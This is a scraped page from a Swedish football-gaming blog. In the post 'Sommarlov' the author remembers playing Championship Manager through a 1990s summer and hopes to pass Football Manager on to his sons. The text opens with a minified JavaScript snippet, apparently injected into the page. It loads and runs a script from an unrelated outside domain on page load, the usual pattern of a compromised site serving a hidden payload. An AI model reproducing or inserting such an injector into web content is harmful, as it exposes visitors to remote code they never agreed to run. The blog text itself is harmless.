;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Sommarlov – FMSweden
Meny Stäng

Sommarlov

Skolorna slutar och sommarlovet tar sin början. Numera betyder det att man ska försöka sysselsätta tre grabbar i åldrarna 5-13 år, men det fanns en tid när sommarlovet betydde 24/7 med CM och polare. 

Jag kommer ihåg första sommarlovet jag hade fått tag i CM. Datorn var relativt ny och den var inköpt för att kunna göra lite skoluppsatser, men också för att kunna spela dataspel. CM-serien var relativt ny och jag hade väl kanske inte fastnat riktigt ännu. Helt plötsligt dök det upp ett spel, där man kunde vara de nordiska ligorna. Det var rena julafton för en Blåvittsupporter som jag själv.

Där och då bestämde jag mig för att detta sommarlovet ska bli det där Blåvitt vinner Champions League. Jag slutar inte förrän jag gjort det.

Det tog ungefär en vecka, för jag spelade nonstop. Alla lediga stunder som inte innehöll fotboll på gården eller träningar med laget gick åt till CM. Stranden och Liseberg i all ära, men det var CM som tog all min tid. Jag lyckades få med mig en av mina bästa polare på CM-tåget och vi varvade spelet den sommaren. Vi spelade med alla ligor och fanimej nästan alla lag. Det var Leeds v Liverpool, det var Real v Barca, det var Milan v Inter. Vi plöjde genom liga efter liga och hittade fler och fler underbara spelare, som vi sedan kunde köpa i vårt nästa save.

Jag försöker få in min 10-årige son på FM. Det händer för lite tycker han, han föredrar FIFA, han vill spela själv. Han fattar inte grejen. Han förstår inte att det är precis det som är grejen. Man sitter och avvaktar, ska jag byta eller inte? Ska jag backa hem, trycka på? Sen kommer det där avgörande momentet och hela helvete brakar löst, antingen i eufori eller frustration.

Detta sommarlovet blir inte som det i mitten på 90-talet, men det ska definitivt hinnas med FM mellan stranden, EM, Liseberg och diverse utflykter. Det är min förbannade skyldighet att föra FM-spelandet vidare, jag ger mig aldrig.

Trevlig helg vänner

SKÅL

Tobbe

 

Please wait...

Liknande Inlägg

2 kommentarer

Lämna ett svar